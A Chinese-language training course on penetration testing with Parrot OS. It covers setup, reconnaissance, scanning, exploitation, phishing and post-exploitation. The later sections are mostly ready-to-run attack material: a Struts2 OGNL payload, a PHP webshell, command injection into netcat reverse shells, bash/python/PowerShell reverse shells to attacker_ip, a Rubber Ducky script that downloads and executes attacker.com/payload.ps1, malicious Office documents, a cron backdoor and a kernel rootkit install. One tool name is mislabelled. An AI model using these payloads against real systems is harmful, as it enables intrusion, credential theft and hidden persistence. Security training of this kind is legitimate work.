掌握Parrot OS安全测试技能从零基础到专业渗透测试工程师的完整培训课程助你成为网络安全专家

威震华夏关云长

引言：网络安全与Parrot OS的重要性

在当今数字化时代，网络安全已成为个人、企业和国家安全的重中之重。随着网络攻击的日益复杂和频繁，对专业渗透测试工程师和安全专家的需求也在不断增长。Parrot OS作为一款专为安全测试、数字取证和渗透测试设计的Linux发行版，为安全专业人士提供了强大的工具集和平台。

本课程将带你从零基础开始，逐步掌握Parrot OS的使用和安全测试技能，最终成为一名专业的渗透测试工程师和网络安全专家。无论你是完全的新手还是有一定IT基础的学习者，本课程都将为你提供系统、全面的知识体系和实践指导。

第一部分：Parrot OS基础

1.1 什么是Parrot OS

Parrot OS是一个基于Debian的Linux发行版，专为安全专家、开发人员、隐私爱好者和普通用户设计。它预装了大量用于渗透测试、漏洞评估、计算机取证和匿名浏览的工具。与其他安全发行版（如Kali Linux）相比，Parrot OS更加轻量级，适合在低配置设备上运行，同时也提供了更好的隐私保护和匿名性。

Parrot OS的主要特点包括：

• 轻量级设计，可在各种硬件上运行
• 预装超过600种安全工具
• 强调隐私和匿名性
• 定期更新和安全补丁
• 友好的用户界面和社区支持

1.2 安装和配置Parrot OS

在安装Parrot OS之前，确保你的系统满足以下最低要求：

• 处理器：1GHz双核处理器
• 内存：1GB RAM（推荐2GB或更多）
• 存储空间：10GB可用空间
• USB端口或DVD驱动器（用于安装介质）

访问Parrot OS官方网站（https://www.parrotsec.org/）下载适合你需求的版本。ParrotOS提供多种版本：

• Parrot Security：完整版，包含所有安全工具
• Parrot Home：轻量版，适合日常使用
• Parrot Architect：用于开发的自定义版本
• Parrot IoT：专注于物联网安全的版本

对于渗透测试学习，建议下载Parrot Security版本。

下载完成后，你需要创建一个可启动的USB驱动器或DVD。以下是使用dd命令在Linux上创建USB安装介质的步骤：

2. # 确定USB设备名称（通常是/dev/sdb或/dev/sdc）
3. lsblk
5. # 卸载USB设备（如果已挂载）
6. sudo umount /dev/sdX
8. # 使用dd命令将ISO写入USB设备（将sdX替换为你的USB设备名称）
9. sudo dd if=parrot-security-4.11_amd64.iso of=/dev/sdX bs=4M status=progress

复制代码

1. 将USB驱动器或DVD插入计算机并重启。
2. 在启动时进入BIOS/UEFI设置，选择从USB/DVD启动。
3. 从Parrot OS启动菜单中选择”Live Mode”以试用系统，或直接选择”Install Parrot”开始安装。
4. 按照安装向导的提示进行操作，包括：选择语言和地区设置配置网络分区磁盘（新手可以选择自动分区）创建用户账户和密码安装引导加载程序
5. 选择语言和地区设置
6. 配置网络
7. 分区磁盘（新手可以选择自动分区）
8. 创建用户账户和密码
9. 安装引导加载程序
10. 安装完成后，重启系统并移除安装介质。

• 选择语言和地区设置
• 配置网络
• 分区磁盘（新手可以选择自动分区）
• 创建用户账户和密码
• 安装引导加载程序

首次启动Parrot OS后，进行以下基本配置：

2. # 更新系统
3. sudo apt update
4. sudo apt full-upgrade -y
6. # 安装常用软件
7. sudo apt install -y git terminator vim
9. # 配置网络（如果需要）
10. sudo nmtui

复制代码

1.3 基本命令和操作

Parrot OS基于Linux，因此熟悉基本的Linux命令至关重要。以下是一些最常用的命令：

2. # 文件和目录操作
3. ls              # 列出目录内容
4. cd              # 更改目录
5. pwd             # 显示当前工作目录
6. mkdir           # 创建新目录
7. rm              # 删除文件或目录
8. cp              # 复制文件或目录
9. mv              # 移动或重命名文件或目录
11. # 文本操作
12. cat             # 显示文件内容
13. less            # 分页显示文件内容
14. grep            # 在文件中搜索文本
15. nano/vim        # 文本编辑器
17. # 系统信息
18. uname -a        # 显示系统信息
19. top/htop        # 显示系统进程
20. df -h           # 显示磁盘使用情况
21. free -h         # 显示内存使用情况
23. # 权限管理
24. chmod           # 更改文件权限
25. chown           # 更改文件所有者
26. sudo            # 以超级用户权限执行命令

复制代码

Parrot OS使用APT（Advanced Package Tool）作为其包管理系统：

2. # 更新软件包列表
3. sudo apt update
5. # 升级已安装的软件包
6. sudo apt upgrade
8. # 安装新软件包
9. sudo apt install package-name
11. # 删除软件包
12. sudo apt remove package-name
14. # 搜索软件包
15. apt search keyword
17. # 显示软件包信息
18. apt show package-name

复制代码

2. # 显示网络接口信息
3. ip a
4. ifconfig
6. # 测试网络连接
7. ping example.com
9. # 显示路由表
10. ip route
11. route -n
13. # 显示网络连接
14. netstat -tuln
15. ss -tuln
17. # 配置网络（使用NetworkManager文本界面）
18. sudo nmtui

复制代码

Parrot OS使用systemd作为其初始化系统和服务管理器：

2. # 启动服务
3. sudo systemctl start service-name
5. # 停止服务
6. sudo systemctl stop service-name
8. # 重启服务
9. sudo systemctl restart service-name
11. # 启用服务（开机自启）
12. sudo systemctl enable service-name
14. # 禁用服务
15. sudo systemctl disable service-name
17. # 查看服务状态
18. sudo systemctl status service-name

复制代码

第二部分：网络安全基础

2.1 网络基础知识

OSI（Open Systems Interconnection）模型是一个概念性框架，用于理解和标准化网络通信的七个不同层次：

1. 物理层：负责传输原始比特流，包括电缆、物理接口和信号传输。
2. 数据链路层：提供节点到节点的数据传输，处理物理寻址（MAC地址）和错误检测。
3. 网络层：负责数据包的路由和转发，处理逻辑寻址（IP地址）。
4. 传输层：提供端到端的通信服务，确保数据完整性和流量控制（TCP/UDP）。
5. 会话层：建立、管理和终止应用程序之间的连接。
6. 表示层：数据格式化、加密和压缩。
7. 应用层：为应用程序提供网络服务，如HTTP、FTP、SMTP等。

TCP/IP模型是实际使用的网络协议模型，通常被视为OSI模型的简化版本：

1. 网络接口层：对应OSI的物理层和数据链路层。
2. 网际层：对应OSI的网络层，使用IP协议。
3. 传输层：对应OSI的传输层，使用TCP和UDP协议。
4. 应用层：对应OSI的会话层、表示层和应用层。

• IP（Internet Protocol）：负责数据包的路由和寻址。
• TCP（Transmission Control Protocol）：提供可靠的、面向连接的数据传输。
• UDP（User Datagram Protocol）：提供无连接的、快速但不保证可靠的数据传输。
• HTTP/HTTPS（Hypertext Transfer Protocol/Secure）：用于Web浏览和数据传输。
• FTP（File Transfer Protocol）：用于文件传输。
• SSH（Secure Shell）：用于安全远程登录和管理。
• DNS（Domain Name System）：将域名解析为IP地址。
• SMTP/POP3/IMAP：用于电子邮件传输和接收。

• 路由器：连接不同网络，根据IP地址转发数据包。
• 交换机：在局域网内连接设备，根据MAC地址转发数据帧。
• 集线器：简单的网络设备，将数据广播到所有连接的设备。
• 防火墙：监控和控制网络流量，基于安全规则允许或阻止数据传输。
• IDS/IPS（入侵检测/防御系统）：监控网络流量以检测和防止恶意活动。

2.2 安全概念和原则

信息安全的核心原则通常被称为CIA三元组：

• 机密性（Confidentiality）：确保信息只能被授权人员访问。
• 完整性（Integrity）：保护信息不被未授权的修改，确保数据的准确性和完整性。
• 可用性（Availability）：确保授权用户在需要时能够访问信息和资源。

• 认证（Authentication）：验证用户或系统身份的过程。
• 授权（Authorization）：确定已认证用户可以访问哪些资源或执行哪些操作。
• 审计（Accounting/Auditing）：记录和监控用户活动，用于安全分析和合规性检查。

防御深度是一种安全策略，通过多层安全控制来保护系统和数据。即使一层防御被突破，其他层仍能提供保护。

最小权限原则要求用户和系统只被授予完成其任务所需的最小权限。这限制了潜在的安全漏洞和攻击面。

• 攻击面：系统可能被攻击的所有入口点的总和。
• 攻击向量：攻击者用来入侵系统的具体方法或路径。

2.3 常见威胁和攻击类型

• 病毒：附着在其他程序上，执行时复制自身并感染其他文件。
• 蠕虫：独立程序，通过网络自我复制并传播。
• 特洛伊木马：伪装成合法软件的恶意程序。
• 勒索软件：加密用户数据并要求支付赎金以解锁。
• 间谍软件：秘密收集用户信息并发送给第三方。
• 广告软件：自动显示广告的软件。

• DDoS（分布式拒绝服务）：通过大量请求使目标系统过载，导致服务不可用。
• MITM（中间人）：攻击者拦截和可能修改两个通信方之间的数据。
• DNS欺骗：将域名解析到攻击者控制的IP地址。
• ARP欺骗：将本地网络上的IP地址与错误的MAC地址关联。
• SQL注入：通过在SQL查询中插入恶意代码来操纵数据库。
• XSS（跨站脚本）：在网页中注入恶意脚本，影响其他用户。

• 钓鱼：伪装成可信实体以获取敏感信息。
• 鱼叉式钓鱼：针对特定个人或组织的定向钓鱼攻击。
• 商业邮件欺诈：冒充高管或供应商进行财务欺诈。
• 诱饵：使用诱人的内容（如免费软件、电影）诱骗用户执行恶意操作。
• 尾随：物理跟随授权人员进入受限区域。

• 暴力破解：尝试所有可能的密码组合。
• 字典攻击：使用常见单词和短语列表作为密码。
• 凭证填充：使用从其他数据泄露中获得的用户名和密码组合。
• 键盘记录：记录用户的按键以获取密码和其他敏感信息。
• 凭证转储：从系统内存或文件中提取密码哈希。

第三部分：信息收集

信息收集是渗透测试的第一阶段，也是至关重要的一步。在这个阶段，渗透测试人员收集关于目标系统的尽可能多的信息，这些信息将用于后续的漏洞评估和渗透测试。

3.1 被动信息收集

被动信息收集是指在不直接与目标系统交互的情况下收集信息。这种方法更隐蔽，不容易被目标系统检测到。

OSINT是从公开来源收集的信息，包括：

• 公司网站：查找公司信息、员工名单、技术栈等。
• 社交媒体：LinkedIn、Twitter、Facebook等平台上的公司和个人信息。
• 新闻文章：关于公司的新闻报道和公告。
• 财务报告：上市公司提交的财务报告可能包含有用的信息。
• 招聘信息：可能揭示公司使用的技术和系统。
• 公共记录：域名注册、公司注册信息等。

theHarvester是一个用于收集电子邮件、子域名、主机、员工姓名、开放端口和横幅的OSINT工具。

2. # 安装theHarvester
3. sudo apt install theharvester
5. # 使用theHarvester收集信息
6. theHarvester -d example.com -b google -l 100

复制代码

Shodan是一个搜索引擎，可以查找连接到互联网的设备，包括服务器、网络摄像头、IoT设备等。

2. # 安装Shodan CLI
3. sudo pip install shodan
5. # 初始化Shodan API（需要先在Shodan网站注册获取API密钥）
6. shodan init YOUR_API_KEY
8. # 搜索特定组织的设备
9. shodan search org:"Example Organization"
11. # 搜索特定类型的设备
12. shodan search product:"Apache httpd" country:"US"

复制代码

Maltego是一个开源的OSINT和取证工具，用于收集和连接信息，创建关系图。

2. # 安装Maltego
3. sudo apt install maltego
5. # 启动Maltego
6. maltego

复制代码

2. # 使用nslookup查询DNS记录
3. nslookup example.com
5. # 使用dig查询DNS记录
6. dig example.com
8. # 查询MX记录
9. dig example.com MX
11. # 查询NS记录
12. dig example.com NS
14. # 查询TXT记录
15. dig example.com TXT
17. # 使用dnsenum进行DNS枚举
18. sudo apt install dnsenum
19. dnsenum example.com

复制代码

3.2 主动信息收集

主动信息收集涉及直接与目标系统交互，因此更容易被检测到。在进行主动信息收集时，应确保获得适当的授权。

端口扫描用于识别目标系统上开放的服务和端口。

Nmap是最流行的端口扫描工具，功能强大且灵活。

2. # 安装Nmap
3. sudo apt install nmap
5. # 基本TCP扫描
6. nmap example.com
8. # 全面扫描所有TCP端口
9. nmap -p- example.com
11. # 扫描特定端口
12. nmap -p 80,443,8080 example.com
14. # 服务版本检测
15. nmap -sV example.com
17. # 操作系统检测
18. nmap -O example.com
20. # 使用默认脚本扫描
21. nmap -sC example.com
23. # 保存扫描结果
24. nmap -oN scan_results.txt example.com

复制代码

Masscan是一个高速端口扫描器，可以在几分钟内扫描整个互联网。

2. # 安装Masscan
3. sudo apt install masscan
5. # 扫描特定IP范围的端口
6. masscan 192.168.1.0/24 -p 80,443
8. # 高速扫描大量端口
9. masscan 192.168.1.0/24 -p 1-65535 --rate=1000

复制代码

服务枚举是识别运行在开放端口上的服务及其版本的过程。

2. # 使用Nmap进行服务枚举
3. nmap -sV -sC example.com
5. # 使用Netcat进行横幅抓取
6. nc -nv example.com 80
8. # 使用Amap进行应用程序映射
9. sudo apt install amap
10. amap -bq example.com 80

复制代码

2. # 使用Nmap进行OS识别
3. nmap -O example.com
5. # 使用Xprobe2进行OS识别
6. sudo apt install xprobe2
7. xprobe2 example.com

复制代码

2. # 使用Nmap进行网络发现
3. nmap -sn 192.168.1.0/24
5. # 使用Netdiscover进行ARP扫描
6. sudo apt install netdiscover
7. sudo netdiscover -r 192.168.1.0/24
9. # 使用Nmap绘制网络拓扑
10. nmap -O --traceroute example.com

复制代码

3.3 Web应用信息收集

2. # 使用curl获取HTTP头信息
3. curl -I example.com
5. # 使用Wappalyzer浏览器插件识别Web技术
6. # 安装Firefox
7. sudo apt install firefox
8. # 在Firefox中安装Wappalyzer插件
10. # 使用WhatWeb进行Web技术识别
11. sudo apt install whatweb
12. whatweb example.com

复制代码

DirBuster是一个用于查找Web服务器上隐藏文件和目录的工具。

2. # 安装DirBuster
3. sudo apt install dirbuster
5. # 使用DirBuster进行目录枚举
6. dirbuster -u http://example.com -l /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt

复制代码

Gobuster是一个快速的目录和文件枚举工具。

2. # 安装Gobuster
3. sudo apt install gobuster
5. # 使用Gobuster进行目录枚举
6. gobuster dir -u http://example.com -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
8. # 使用Gobuster进行子域名枚举
9. gobuster dns -d example.com -w /usr/share/wordlists/subdomains-top1million-5000.txt

复制代码

2. # 使用Sublist3r进行子域名枚举
3. sudo apt install sublist3r
4. sublist3r -d example.com
6. # 使用Amass进行子域名枚举
7. sudo apt install amass
8. amass enum -passive -d example.com
10. # 使用DNSRecon进行DNS枚举
11. sudo apt install dnsrecon
12. dnsrecon -d example.com -t std

复制代码

第四部分：漏洞评估

漏洞评估是渗透测试的核心阶段，涉及识别目标系统中的安全漏洞并评估其严重性。在这个阶段，我们将使用各种工具和技术来发现潜在的漏洞。

4.1 漏洞扫描

漏洞扫描器是自动化工具，用于识别系统、网络和应用程序中的已知漏洞。

Nessus是最流行的商业漏洞扫描器之一，提供全面的漏洞评估功能。

2. # 下载并安装Nessus（需要注册Nessus账户）
3. wget https://www.tenable.com/downloads/nessus?login_attempt=1
4. sudo dpkg -i nessus.deb
6. # 启动Nessus服务
7. sudo systemctl start nessusd
9. # 访问Nessus Web界面
10. # 打开浏览器，访问 https://localhost:8834
11. # 按照向导完成初始设置
13. # 使用Nessus CLI进行扫描
14. /opt/nessus/bin/nessuscli scan new --name "Basic Scan" --targets "example.com" --policy "basic"

复制代码

OpenVAS是一个开源的漏洞扫描器，功能强大且免费。

2. # 安装OpenVAS
3. sudo apt install openvas
5. # 初始化OpenVAS
6. sudo gvm-setup
8. # 启动OpenVAS服务
9. sudo systemctl start gvmd
10. sudo systemctl start openvas-scanner
11. sudo systemctl start greenbone-security-assistant
13. # 访问OpenVAS Web界面
14. # 打开浏览器，访问 https://127.0.0.1:9392
15. # 使用admin账户和设置的密码登录
17. # 使用Greenbone Security Assistant (GSA)创建和管理扫描

复制代码

Nikto是一个开源的Web服务器扫描器，用于检查Web服务器中的危险文件/CGI、过时的服务器软件和其他问题。

2. # 安装Nikto
3. sudo apt install nikto
5. # 基本Web扫描
6. nikto -h http://example.com
8. # 使用代理进行扫描
9. nikto -h http://example.com -useproxy http://proxy:port
11. # 扫描特定端口
12. nikto -h example.com -p 8080
14. # 保存扫描结果
15. nikto -h http://example.com -output scan_results.txt

复制代码

4.2 漏洞分析

漏洞分析是评估发现的漏洞的严重性和潜在影响的过程。

通用漏洞评分系统（CVSS）是一个开放的标准，用于评估漏洞的严重性。CVSS评分范围从0.0到10.0，分数越高表示漏洞越严重。

CVSS评分由三个指标组组成：

• 基础指标：表示漏洞的固有特征，不随时间和环境变化。
• 时间指标：随时间变化的漏洞特征。
• 环境指标：特定用户环境中的漏洞特征。

自动化工具可能会产生误报，因此手动验证发现的漏洞至关重要。

2. # 验证Heartbleed漏洞
3. sudo apt install openssl
4. openssl s_client -connect example.com:443 -tlsextdebug
5. # 然后输入：
6. HEARTBEAT
8. # 验证Shellshock漏洞
9. curl -A '() { :;}; echo "Shellshock Vulnerable"' http://example.com/cgi-bin/test.cgi
11. # 验证Apache Struts2漏洞
12. curl http://example.com/action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{%27cat%27,%27/etc/passwd%27})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}

复制代码

使用漏洞数据库可以获取关于已知漏洞的详细信息：

• CVE（Common Vulnerabilities and Exposures）：https://cve.mitre.org/
• NVD（National Vulnerability Database）：https://nvd.nist.gov/
• Exploit-DB：https://www.exploit-db.com/

2. # 使用searchsploit搜索漏洞
3. sudo apt install exploitdb
4. searchsploit apache 2.4.39
6. # 更新Exploit-DB数据库
7. searchsploit -u

复制代码

4.3 Web应用漏洞评估

Web应用是常见的攻击目标，因此专门的Web应用漏洞评估至关重要。

OWASP Zed Attack Proxy（ZAP）是一个开源的Web应用安全扫描器。

2. # 安装OWASP ZAP
3. sudo apt install zaproxy
5. # 启动OWASP ZAP
6. zap
8. # 使用ZAP进行自动化扫描
9. # 在ZAP GUI中，输入目标URL，然后点击"Automated Scan"

复制代码

Burp Suite是一个流行的Web应用安全测试平台，提供社区版（免费）和专业版（付费）。

2. # 下载并安装Burp Suite Community Edition
3. # 访问 https://portswigger.net/burp/communitydownload 下载安装包
4. sudo dpkg -i burpsuite_community_linux.deb
6. # 启动Burp Suite
7. burpsuite
9. # 配置浏览器代理以使用Burp Suite
10. # 在浏览器中设置代理为127.0.0.1:8080
11. # 导入Burp Suite的CA证书

复制代码

SQL注入是一种代码注入技术，攻击者可以通过在Web应用的输入字段中插入恶意SQL语句来操纵数据库。

2. # 使用sqlmap进行SQL注入测试
3. sudo apt install sqlmap
5. # 基本SQL注入测试
6. sqlmap -u "http://example.com/page.php?id=1"
8. # 测试POST请求中的SQL注入
9. sqlmap -u "http://example.com/login.php" --data="username=admin&password=password"
11. # 获取数据库信息
12. sqlmap -u "http://example.com/page.php?id=1" --dbs
14. # 获取特定数据库的表
15. sqlmap -u "http://example.com/page.php?id=1" -D database_name --tables
17. # 获取特定表的数据
18. sqlmap -u "http://example.com/page.php?id=1" -D database_name -T table_name --dump

复制代码

XSS是一种攻击技术，攻击者可以在Web页面中注入恶意脚本，当用户访问该页面时，脚本会在用户的浏览器中执行。

2. # 手动测试XSS
3. # 在输入字段中插入以下payload：
4. <script>alert('XSS')</script>
5. <img src=x onerror=alert('XSS')>
6. <svg onload=alert('XSS')>
8. # 使用XSStrike进行XSS扫描
9. git clone https://github.com/s0md3v/XSStrike.git
10. cd XSStrike
11. python3 xsstrike.py -u "http://example.com/search.php?query=test"

复制代码

文件包含漏洞允许攻击者包含服务器上的文件，可能导致敏感信息泄露或远程代码执行。

2. # 测试本地文件包含（LFI）
3. http://example.com/page.php?file=../../../../etc/passwd
5. # 测试远程文件包含（RFI）
6. http://example.com/page.php?file=http://attacker.com/evil.txt
8. # 使用Liffy进行LFI扫描
9. git clone https://github.com/D35m0nd142/Liffy.git
10. cd Liffy
11. python liffy.py -u "http://example.com/page.php?file=test"

复制代码

SSRF是一种攻击，攻击者可以操纵服务器向任意地址发送请求。

2. # 测试SSRF
3. http://example.com/page.php?url=http://127.0.0.1:22
4. http://example.com/page.php?url=file:///etc/passwd
5. http://example.com/page.php?url=dict://127.0.0.1:22/info

复制代码

第五部分：渗透测试

渗透测试是模拟真实攻击以评估系统安全性的过程。在这个阶段，我们将利用之前收集的信息和发现的漏洞来尝试获取对目标系统的未授权访问。

5.1 渗透测试方法论

渗透测试通常遵循以下方法论：

1. 规划和准备：确定测试范围、目标和规则。
2. 信息收集：收集关于目标系统的信息。
3. 漏洞评估：识别和评估系统中的漏洞。
4. 利用：尝试利用发现的漏洞获取访问权限。
5. 后渗透：在获得访问权限后，尝试提升权限、维持访问和获取敏感数据。
6. 报告：编写详细的报告，包括发现的漏洞、利用方法和建议的修复措施。

5.2 网络渗透测试

2. # 使用Hydra进行SSH暴力破解
3. sudo apt install hydra
4. hydra -L usernames.txt -P passwords.txt ssh://example.com
6. # 使用Medusa进行SSH暴力破解
7. sudo apt install medusa
8. medusa -u username -P passwords.txt -h example.com -M ssh
10. # 使用John the Ripper进行密码破解
11. sudo apt install john
12. john --wordlist=passwords.txt --format=shadow hashes.txt

复制代码

2. # 使用Mimikatz转储Windows凭证
3. # 在Windows目标系统上运行
4. # 下载Mimikatz：https://github.com/gentilkiwi/mimikatz
6. # 提升权限
7. privilege::debug
9. # 转储登录凭证
10. sekurlsa::logonpasswords
12. # 使用Hashcat破解密码哈希
13. sudo apt install hashcat
14. hashcat -m 1000 hashes.txt passwords.txt

复制代码

2. # 使用enum4linux枚举SMB共享
3. sudo apt install enum4linux
4. enum4linux -a example.com
6. # 使用smbclient访问SMB共享
7. sudo apt install smbclient
8. smbclient //example.com/share -U username
10. # 使用smbmap枚举SMB共享
11. sudo apt install smbmap
12. smbmap -H example.com -u username -p password
14. # 使用CrackMapExec执行SMB攻击
15. sudo apt install crackmapexec
16. crackmapexec smb example.com -u username -p password --shares

复制代码

2. # 使用onesixtyone进行SNMP枚举
3. sudo apt install onesixtyone
4. onesixtyone -c community_strings.txt example.com
6. # 使用snmpwalk进行SNMP枚举
7. sudo apt install snmp
8. snmpwalk -v 2c -c public example.com

复制代码

2. # 使用arpspoof进行ARP欺骗
3. sudo apt install dsniff
4. arpspoof -i eth0 -t target_ip gateway_ip
5. arpspoof -i eth0 -t gateway_ip target_ip
7. # 使用Ettercap进行ARP欺骗
8. sudo apt install ettercap-graphical
9. ettercap -G
10. # 在GUI中，选择"Sniff" -> "Unified sniffing"，选择网络接口
11. # 然后选择"Hosts" -> "Scan for hosts"
12. # 选择"Hosts" -> "Hosts list"，将目标添加到Target 1，将网关添加到Target 2
13. # 选择"Mitm" -> "ARP poisoning"，选择"Sniff remote connections"

复制代码

2. # 使用Ettercap进行DNS欺骗
3. # 编辑etter.dns文件，添加要欺骗的域名
4. sudo nano /etc/ettercap/etter.dns
5. # 添加行：example.com A 192.168.1.100
7. # 启动Ettercap并启用DNS欺骗插件
8. ettercap -G
9. # 在Plugins菜单中，选择"Manage the plugins"，双击"dns_spoof"

复制代码

5.3 Web应用渗透测试

2. # 使用sqlmap进行SQL注入利用
3. # 获取当前数据库
4. sqlmap -u "http://example.com/page.php?id=1" --current-db
6. # 获取当前用户
7. sqlmap -u "http://example.com/page.php?id=1" --current-user
9. # 检查是否为数据库管理员
10. sqlmap -u "http://example.com/page.php?id=1" --is-dba
12. # 执行操作系统命令
13. sqlmap -u "http://example.com/page.php?id=1" --os-shell
15. # 获取数据库shell
16. sqlmap -u "http://example.com/page.php?id=1" --sql-shell

复制代码

2. # 使用curl上传Webshell
3. curl -F "file=@shell.php" http://example.com/upload.php
5. # Webshell示例（PHP）
6. <?php system($_GET['cmd']); ?>
8. # 使用Webshell执行命令
9. curl "http://example.com/uploads/shell.php?cmd=id"

复制代码

2. # 测试命令注入
3. http://example.com/page.php?ip=127.0.0.1;id
4. http://example.com/page.php?ip=127.0.0.1&&id
5. http://example.com/page.php?ip=127.0.0.1|id
7. # 使用Netcat创建反向shell
8. # 在攻击者机器上监听
9. nc -lvnp 4444
11. # 在目标系统上执行命令注入
12. http://example.com/page.php?ip=127.0.0.1;nc -e /bin/bash attacker_ip 4444

复制代码

2. # 使用wpscan扫描WordPress漏洞
3. sudo apt install wpscan
4. wpscan --url http://example.com
6. # 枚举用户
7. wpscan --url http://example.com --enumerate u
9. # 暴力破解用户密码
10. wpscan --url http://example.com --passwords passwords.txt --usernames usernames.txt
12. # 使用WordPress插件漏洞
13. # 例如，使用Contact Form 7插件漏洞
14. # 在插件中插入以下内容：
15. [email* your-email "onchange="eval(String.fromCharCode(97,108,101,114,116,40,39,88,83,83,39,41))"]

复制代码

2. # 使用joomscan扫描Joomla漏洞
3. sudo apt install joomscan
4. joomscan -u http://example.com
6. # 使用Joomla组件漏洞
7. # 例如，使用com_fields组件漏洞
8. http://example.com/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%27,concat(0x7e,version()),0x7e)--%20

复制代码

2. # 使用droopescan扫描Drupal漏洞
3. sudo apt install droopescan
4. droopescan scan drupal -u http://example.com
6. # 使用Drupalgeddon2漏洞（CVE-2018-7600）
7. # 使用Python脚本利用
8. git clone https://github.com/pimps/CVE-2018-7600.git
9. cd CVE-2018-7600
10. python3 cve-2018-7600.py -t http://example.com -c "id"

复制代码

5.4 社会工程学攻击

社会工程学攻击利用人的心理弱点来获取信息或访问权限。

2. # 使用Social Engineering Toolkit (SET)创建钓鱼网站
3. sudo apt install set
4. setoolkit
6. # 选择1) Social-Engineering Attacks
7. # 选择2) Website Attack Vectors
8. # 选择3) Credential Harvester Attack Method
9. # 选择1) Web Templates
10. # 选择模板（例如Google）
11. # 输入攻击者IP地址
12. # SET将创建一个克隆网站，捕获输入的凭证
14. # 使用Phishing Frenzy创建钓鱼活动
15. # 安装Phishing Frenzy
16. git clone https://github.com/pentestgeek/phishing-frenzy.git
17. cd phishing-frenzy
18. sudo ./install.sh
20. # 启动Phishing Frenzy Web界面
21. sudo service apache2 start
22. sudo service postgresql start
23. sudo service pf-server start
24. # 访问 https://localhost/phishing

复制代码

2. # 使用MSFVenom创建恶意文档
3. sudo apt install metasploit-framework
5. # 创建恶意Word文档
6. msfvenom -p windows/meterpreter/reverse_tcp LHOST=attacker_ip LPORT=4444 -f doc > malicious.doc
8. # 使用MacroPack创建恶意宏
9. sudo apt install macropack
10. macropack -t WORD -G -o malicious.doc
11. # 然后添加恶意宏代码

复制代码

2. # 使用USB Rubber Ducky创建攻击脚本
3. # 购买USB Rubber Ducky：https://shop.hak5.org/products/usb-rubber-ducky
5. # 编写Ducky Script
6. # 示例：打开命令提示符并下载执行恶意脚本
7. DELAY 1000
8. GUI r
9. DELAY 500
10. STRING cmd
11. ENTER
12. DELAY 500
13. STRING powershell -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadString('http://attacker.com/payload.ps1') | IEX"
14. ENTER
16. # 将脚本编码为二进制并写入USB Rubber Ducky
18. # 使用Bash Bunny创建USB攻击
19. # 购买Bash Bunny：https://shop.hak5.org/products/bash-bunny
21. # 编写payload.txt
22. # 示例：执行快速键盘攻击并建立反向连接
23. ATTACKMODE HID STORAGE
24. LED R
25. RUN WIN "powershell -WindowStyle Hidden -Command "\$client = New-Object System.Net.Sockets.TCPClient('attacker_ip',4444);\$stream = \$client.GetStream();[byte[]]\$bytes = 0..65535|%{0};while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){;\$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0, \$i);\$sendback = (iex \$data 2>&1 | Out-String );\$sendback2 = \$sendback + 'PS ' + (pwd).Path + '> ';\$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2);\$stream.Write(\$sendbyte,0,\$sendbyte.Length);\$stream.Flush()};\$client.Close()""
26. LED G

复制代码

第六部分：后渗透和报告

在成功获取对目标系统的访问权限后，渗透测试人员需要进行后渗透活动，以评估攻击者可能造成的进一步损害，并编写详细的报告。

6.1 权限提升

权限提升是指从低权限用户获取更高权限（如root或管理员权限）的过程。

2. # 检查内核版本
3. uname -a
5. # 检查已安装的软件包
6. dpkg -l
7. rpm -qa
9. # 检查SUID/GUID文件
10. find / -perm -4000 -type f 2>/dev/null
11. find / -perm -2000 -type f 2>/dev/null
13. # 检查可写文件和目录
14. find / -writable -type d 2>/dev/null
15. find / -writable -type f 2>/dev/null
17. # 检查cron任务
18. crontab -l
19. ls -la /etc/cron*
21. # 使用Linux Exploit Suggester
22. git clone https://github.com/mzet-/linux-exploit-suggester.git
23. cd linux-exploit-suggester
24. ./linux-exploit-suggester.sh
26. # 使用LinPEAS进行权限提升枚举
27. wget https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/raw/master/linPEAS/linpeas.sh
28. chmod +x linpeas.sh
29. ./linpeas.sh
31. # 利用Dirty Cow漏洞（CVE-2016-5195）
32. gcc -pthread dirty.c -o dirty -lcrypt
33. ./dirty

复制代码

2. # 检查系统信息
3. systeminfo
5. # 检查已安装的软件和补丁
6. wmic qfe get Caption,Description,HotFixID,InstalledOn
8. # 检查用户和组
9. net user
10. net localgroup
12. # 检查服务配置
13. wmic service get name,displayname,pathname,startmode
15. # 检查计划任务
16. schtasks /query /fo LIST /v
18. # 使用Windows Exploit Suggester
19. git clone https://github.com/gellin/windows-exploit-suggester.git
20. cd windows-exploit-suggester
21. python windows-exploit-suggester.py --systeminfo systeminfo.txt
23. # 使用PowerSploit进行权限提升
24. git clone https://github.com/PowerShellMafia/PowerSploit.git
25. Import-Module PowerSploit/Privesc/PowerUp.ps1
26. Invoke-AllChecks
28. # 利用MS16-032漏洞
29. # 使用PowerShell脚本
30. Invoke-MS16-032

复制代码

6.2 维持访问

维持访问是指确保在系统重启或账户更改后仍能保持对目标系统的访问权限。

2. # 添加SSH密钥
3. mkdir -p ~/.ssh
4. echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC..." >> ~/.ssh/authorized_keys
6. # 创建反向shell
7. # 使用Bash
8. bash -i >& /dev/tcp/attacker_ip/4444 0>&1
10. # 使用Python
11. python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("attacker_ip",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
13. # 使用Netcat
14. nc -e /bin/bash attacker_ip 4444
16. # 创建cron任务后门
17. echo "* * * * * /bin/bash -i >& /dev/tcp/attacker_ip/4444 0>&1" | crontab -
19. # 创建rootkit
20. # 使用Azazel rootkit
21. git clone https://github.com/m0nad/Diamorphine.git
22. cd Diamorphine
23. make
24. insmod diamorphine.ko
